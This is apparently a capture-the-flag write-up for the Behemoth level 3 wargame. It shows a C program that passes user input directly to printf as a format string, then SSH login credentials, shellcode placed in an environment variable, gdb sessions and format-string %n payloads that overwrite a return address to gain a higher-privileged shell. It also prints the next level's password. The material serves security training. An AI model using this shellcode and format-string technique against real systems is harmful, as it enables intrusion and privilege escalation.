behemoth - 03

#include <stdio.h>int main(int argc, char *argv[]){char buf[200];printf("Identify yourself: ");fgets(buf, 200, stdin);printf("Welcome, ");printf(buf);puts("\naaaand goodbye again.");return 0;}

root@today:~# ssh behemoth3@178.79.134.250behemoth3@178.79.134.250's password: nieteidielbehemoth3@melinda:~$ cd /behemothbehemoth3@melinda:/behemoth$ export EGG=$(python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"')behemoth3@melinda:/behemoth$ /tmp/shui3/env EGG ./behemoth30xffffd8abbehemoth3@melinda:/behemoth$ gdb -tui behemoth3(gdb) b main(gdb) layout asm(gdb) run(gdb) i r espesp            0xffffd5b8       0xffffd5b8(gdb) behemoth3@melinda:/behemoth$ (python -c 'print "\xbc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷       200aaaand goodbye again.behemoth3@melinda:/behemoth$ (python -c 'print "\xcc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷       200aaaand goodbye again.behemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff" + "%10d%6$n"') | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷       200aaaand goodbye again.Segmentation faultbehemoth3@melinda:/behemoth$ (python -c 'print "\xdc\xd5\xff\xff\xde\xd5\xff\xff" + "%55459x%6$n%10068x%7$n"' ; cat) | ./behemoth3Identify yourself: Welcome, 锟斤拷锟斤拷锟斤拷锟斤拷        c8   f7fcbc20aaaand goodbye again.whoamibehemoth4cat /etc/behemoth_pass/behemoth4ietheishei^C

   ┌─────────────────────────────────────────────────────────────────────────────────┐   │0x804847d <main>                push   %ebp                                      │   │0x804847e <main+1>              mov    %esp,%ebp                                 │   │0x8048480 <main+3>              and    $0xfffffff0,%esp                          │   │0x8048483 <main+6>              sub    $0xe0,%esp                                │   │0x8048489 <main+12>             movl   $0x8048570,(%esp)                         │   │0x8048490 <main+19>             call   0x8048330 <printf@plt>                    │   │0x8048495 <main+24>             mov    0x80497a4,%eax                            │   │0x804849a <main+29>             mov    %eax,0x8(%esp)                            │   │0x804849e <main+33>             movl   $0xc8,0x4(%esp)                           │   │0x80484a6 <main+41>             lea    0x18(%esp),%eax                           │   │0x80484aa <main+45>             mov    %eax,(%esp)                               │   │0x80484ad <main+48>             call   0x8048340 <fgets@plt>                     │   │0x80484b2 <main+53>             movl   $0x8048584,(%esp)                         │   │0x80484b9 <main+60>             call   0x8048330 <printf@plt>                    │   │0x80484be <main+65>             lea    0x18(%esp),%eax                           │   │0x80484c2 <main+69>             mov    %eax,(%esp)                               │   │0x80484c5 <main+72>             call   0x8048330 <printf@plt>                    │   │0x80484ca <main+77>             movl   $0x804858e,(%esp)                         │   │0x80484d1 <main+84>             call   0x8048350 <puts@plt>                      │   │0x80484d6 <main+89>             mov    $0x0,%eax                                 │   │0x80484db <main+94>             leave                                            │   │0x80484dc <main+95>             ret                                              │   └─────────────────────────────────────────────────────────────────────────────────┘